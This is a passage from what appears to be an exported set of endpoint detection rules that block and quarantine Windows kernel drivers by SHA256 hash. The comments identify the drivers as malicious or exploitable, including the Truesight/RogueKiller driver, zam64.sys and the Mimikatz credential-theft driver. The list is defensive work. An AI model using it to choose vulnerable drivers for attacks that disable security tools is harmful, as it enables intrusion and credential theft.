"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976606Z", + "creation_date": "2026-03-23T11:45:29.976609Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976614Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3325f541c9930a321930853e0d7f0f4c35ba99f99a97bfe275c60248957720fb", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48b6c077-8071-5316-bd5f-a394196bd70b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159031Z", + "creation_date": "2026-03-23T11:45:31.159033Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159039Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b13218595ab037f196cd60fcb63c508dfdb297dc9ec0e1503c98c889bd261e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48bea4f6-2d8f-59aa-83e4-651b7fb1f338", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495474Z", + "creation_date": 
"2026-03-23T11:45:31.495476Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495482Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f94cdfde51e553422161966273904386e78ec50440b3b87453dc272c96e07e3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48bffc64-bfa0-5d18-a704-505016c9a4fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818155Z", + "creation_date": "2026-03-23T11:45:30.818157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818162Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd3cf8b9af255b5d4735782d3653be38578ff5be18846b13d05867a6159aaa53", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48c1d90d-dde3-557e-b5e2-7f6012d9b58e", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147448Z", + "creation_date": "2026-03-23T11:45:31.147450Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147455Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "893dc1f05094678d99431e580ae49b12980f8e17faf91716b620920a2ca70f87", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48cc104e-8ecc-58cf-9e7b-1aae6b015f13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971470Z", + "creation_date": "2026-03-23T11:45:29.971472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.971478Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e428ddf9afc9b2d11e2271f0a67a2d6638b860c2c12d4b8cc63d33f3349ee93f", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48ce33ef-d4f2-5ea4-b09c-2e7aee54ed7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978153Z", + "creation_date": "2026-03-23T11:45:29.978155Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978160Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae", + "comment": "Malicious Kernel Driver (aka 0x3040_blacklotus_beta_driver.sys) [https://www.loldrivers.io/drivers/8750b245-af35-4bc6-9af3-dc858f9db64f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48d79238-e8c3-5271-a44f-d04812bc4c32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828525Z", + "creation_date": "2026-03-23T11:45:30.828527Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ce8b50aafe609aa99089555ef270fd5add09356324c4dc48c4ee5f61abf6a38", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "48fd3df5-707b-5fb8-8369-ed3e8db97554", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487975Z", + "creation_date": "2026-03-23T11:45:31.487976Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487982Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "18d5c494049fae47cc073a96d01ab43209c44641e3f09901273927fb08cc02b4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "490119f2-8d61-5531-b267-4182f549cab0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616834Z", + "creation_date": "2026-03-23T11:45:29.616837Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616845Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ccc32e11372896cc01d7780e1176ed6fedd17f846001bc3bf78699e4448105f", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "490b8a80-0607-58ee-b194-48f707d73dab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454848Z", + "creation_date": "2026-03-23T11:45:30.454851Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454860Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd4fedd5662122cbfe046a12e2137294ef1cb7822238d9e24eacc78f22f8e93d", + "comment": "Vulnerable Kernel Driver (aka NICM.sys) [https://www.loldrivers.io/drivers/0f8e317e-ad2b-4b02-9f96-603bb8d28604/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "490c18e2-13eb-59a5-8374-d2eb299a928c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146081Z", + "creation_date": "2026-03-23T11:45:32.146083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146088Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38050334f2043b6f42fccb934b4eebc9211755a0e9ad1485740351a272696f71", + "comment": "Malicious Kernel Driver (aka driver_85ca0dcd.sys) [https://www.loldrivers.io/drivers/e1c29414-5b5b-44f4-84cc-e6f55d9a23c6/] 
[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4911d9dd-a781-5b78-8c6c-1a98bd1d257e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818505Z", + "creation_date": "2026-03-23T11:45:30.818507Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818512Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bae4372a9284db52dedc1c1100cefa758b3ec8d9d4f0e5588a8db34ded5edb1f", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4924b956-3015-5281-bb7b-fe741d987855", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830771Z", + "creation_date": "2026-03-23T11:45:30.830773Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830778Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3537166808a46eacd98c3b96419b586ce6b94a02b7694ade5f1333cf83069a7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49258966-1a5c-578e-8491-061c83062006", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971016Z", + "creation_date": "2026-03-23T11:45:29.971020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971028Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "931e4d6f7f04b122bc5bc6a61fb4e0186796623f4fc72d0c42ccfa886f1c5fb2", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4927940f-fae7-5a26-965e-fec21042e33a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498442Z", + "creation_date": "2026-03-23T11:45:31.498446Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e33fc043d24f4ec16763c65a424429fb316b0ffb668271b8f3d3edb58b164ae3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "492cd1fc-24c6-5ab0-adfd-752fa5f349f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619850Z", + "creation_date": "2026-03-23T11:45:29.619852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "22afee6f0ec783d59ef4f5d6c189b78fa26302f0ed09670b7bbc9bae26bdb0e5", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4951b748-bc81-5db0-9931-556b1ba694d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141540Z", + "creation_date": "2026-03-23T11:45:31.141542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0dff65fb3b2ee96454e641f57a416159d1993c0bec3796aa96b79d9e1248f354", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4957d8c1-c589-50a6-8978-c784de79dec1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477099Z", + "creation_date": "2026-03-23T11:45:31.477103Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477113Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee2e35139eedef641adfb4960e647d41e2f12f9fbb995404d30f69d13775fe4c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "495b8d86-bdb8-5629-bcf4-bd5266f8beba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819317Z", + "creation_date": "2026-03-23T11:45:31.819320Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "037cd03cf102c226c51d266f9d35a4bd8aee3e07fac0e07a25e9def9db50e101", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "496b71c8-12ed-58e3-aa03-f02ffa7f546e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832169Z", + "creation_date": "2026-03-23T11:45:30.832171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832177Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc871d60b9e47e6f3b41abdbc43e7754888d9c72e11877188919582cbba266a8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49722c51-7f78-546d-925b-fc93bab9f384", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.817714Z", + "creation_date": "2026-03-23T11:45:30.817718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817727Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8fe475d3082a0226ae9fa945542ac3e0cb5214c0f44193dcff12514cadf52101", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "497b38a1-ddad-5c72-9e6f-3f2f3277a6d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809901Z", + "creation_date": "2026-03-23T11:45:31.809903Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b411b159a3b4de03f801fe44f1712a5881f8ed9640cae3ac1a4605972df08ab0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 
+} +{ + "id": "497f875d-8af8-5196-94ab-af6304af35e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476968Z", + "creation_date": "2026-03-23T11:45:30.476972Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476980Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "30accf1de5969ff5bf958786b9c9deb9001d1a19d121aac8b3c92c5b463a087e", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "499da550-17d7-53bc-9324-ca8bca8375f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616703Z", + "creation_date": "2026-03-23T11:45:29.616705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
